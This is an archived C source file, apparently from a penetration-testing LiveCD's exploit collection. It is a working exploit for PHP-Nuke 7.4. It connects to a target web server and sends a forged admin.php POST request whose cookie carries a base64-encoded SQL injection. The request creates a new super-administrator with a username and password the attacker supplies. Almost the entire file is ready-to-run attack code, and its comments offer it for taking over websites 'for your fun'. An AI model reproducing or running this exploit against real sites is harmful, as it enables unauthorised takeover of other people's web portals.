home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpnuke / php-nuke.7.4.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-03-05  |  4.2 KB  |  159 lines
  1. /* 
  2.  * old exploit but what pretty code /str0ke
  3.  */
  4.  
  5. /****************************************************
  6. *                                                   *
  7. * phpNUKE v7.4 exploit                              *
  8. *                                                   *
  9. * this exploit create new admin with relative       *
  10. * passwd that you specified on parameter of exploit *
  11. * you take administrative control of the webPortal  *
  12. *                                                   *
  13. * Reverences: http://www.osvdb.org/9563             * 
  14. *                                                   *
  15. * coded by: Silentium of Anacron Group Italy        *
  16. *      date: 07/02/2005                             *
  17. *    e-mail: anacrongroupitaly[at]autistici[dot]org *
  18. *   my_home: www.autistici.org/anacron.group-italy  *
  19. *                                                   *
  20. * this tool is developed under GPL license          *
  21. * no(c) .:. copyleft                                *
  22. *                                                   *
  23. ****************************************************/
  24.  
  25. #include <stdio.h>
  26. #include <stdlib.h>
  27. #include <sys/types.h>
  28. #include <sys/socket.h>
  29. #include <netinet/in.h>
  30. #include <netdb.h>
  31.  
  32. #define PORT 80        // port of web server 
  33.  
  34. void info(void);
  35. void sendxpl(FILE *out, char *argv[]);
  36. void errsock(void);
  37. void errgeth(void);
  38. void errconn(char *argv[]);
  39.  
  40. int main(int argc, char *argv[]){
  41.  
  42. FILE *out;
  43. int sock, sockconn;
  44. struct sockaddr_in addr;
  45. struct hostent *hp;
  46.  
  47. if(argc!=5)
  48.    info();
  49.    
  50. if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
  51.    errsock();
  52.    
  53.    system("clear");
  54.    printf("[*] Creating socket        [OK]\n");
  55.  
  56. if((hp = gethostbyname(argv[1])) == NULL)
  57.    errgeth();
  58.    
  59.    printf("[*] Resolving victim host    [OK]\n");
  60.    
  61. memset(&addr,0,sizeof(addr));
  62. memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
  63. addr.sin_family = AF_INET;
  64. addr.sin_port = htons(PORT);
  65.  
  66. sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
  67. if(sockconn < 0)
  68.    errconn(argv);
  69.    
  70.    printf("[*] Connecting at victim host   [OK]\n");
  71.    
  72. out = fdopen(sock,"a");
  73. setbuf(out,NULL);
  74.  
  75. sendxpl(out,argv);
  76.  
  77.    printf("[*] Now check your username and password\n" 
  78.           "    on http://%s%s\n\n",argv[1],argv[2]);
  79.  
  80. shutdown(sockconn,2);
  81. close(sockconn);
  82.  
  83. return 0;
  84.  
  85. }
  86.  
  87.  
  88. void info(void){
  89.  
  90. system("clear");
  91. printf("#########################################\n"
  92.        "# phpNUKE v7.4 exploit                  #\n"
  93.        "#########################################\n"
  94.        "# this exploit create an admin with     #\n"
  95.        "# the relative password, for your fun.  #\n"
  96.        "# exploit coded by Silentium            #\n"
  97.        "# Anacron Group Italy                   #\n"
  98.        "# www.autistici.org/anacron-group-italy #\n"
  99.        "#########################################\n\n"
  100.        "[Use]\n\n" 
  101.        " silePNUKExpl <victim_host> <path_adminpage> <username> <password>\n\n"
  102.        "[example]\n\n"
  103.        " silePNUKExpl www.victim.com /admin.php sile silePass\n\n"); 
  104. exit(1);
  105.  
  106. }
  107.  
  108.  
  109. void sendxpl(FILE *out, char *argv[]){
  110.  
  111. int size = 145;
  112.  
  113. size+=sizeof(argv[3]);
  114. size+=sizeof(argv[4]);
  115.     
  116.     fprintf(out,"POST %s HTTP/1.0\n"
  117.                 "Connection: Keep-Alive\n"
  118.                 "Pragma: no-cache\n"
  119.                 "Cache-control: no-cache\n"
  120.                 "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
  121.                 "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
  122.                 "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
  123.                 "Accept-Language: en\n"
  124.                 "Host: %s\n"
  125.                 "Content-Type: application/x-www-form-urlencoded\n"
  126.                 "Content-Length: %d\n\n"
  127.                 "add_aid=%s&add_name=morte&add_pwd=%s&add_email=email%%40mail.com&admin="
  128.                 "eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor&Submit="
  129.                 "Create+Admin\n\n",argv[2],argv[1],size,argv[3],argv[4]);
  130.                  
  131.                  printf("[*] Sending exploit        [OK]\n\n");
  132.  
  133. }
  134.             
  135.                  
  136. void errsock(void){
  137.  
  138. system("clear");
  139. printf("[x] Creating socket    [FAILED]\n\n");
  140. exit(1);
  141.  
  142. }
  143.  
  144.  
  145. void errgeth(void){
  146.  
  147. printf("[x] Resolving victim host    [FAILED]\n\n");
  148. exit(1);
  149.  
  150. }
  151.  
  152.  
  153. void errconn(char *argv[]){
  154.  
  155. printf("[x] Connecting at victim host    [FAILED]\n\n",argv[1]);
  156. exit(1);
  157.  
  158. }
  159.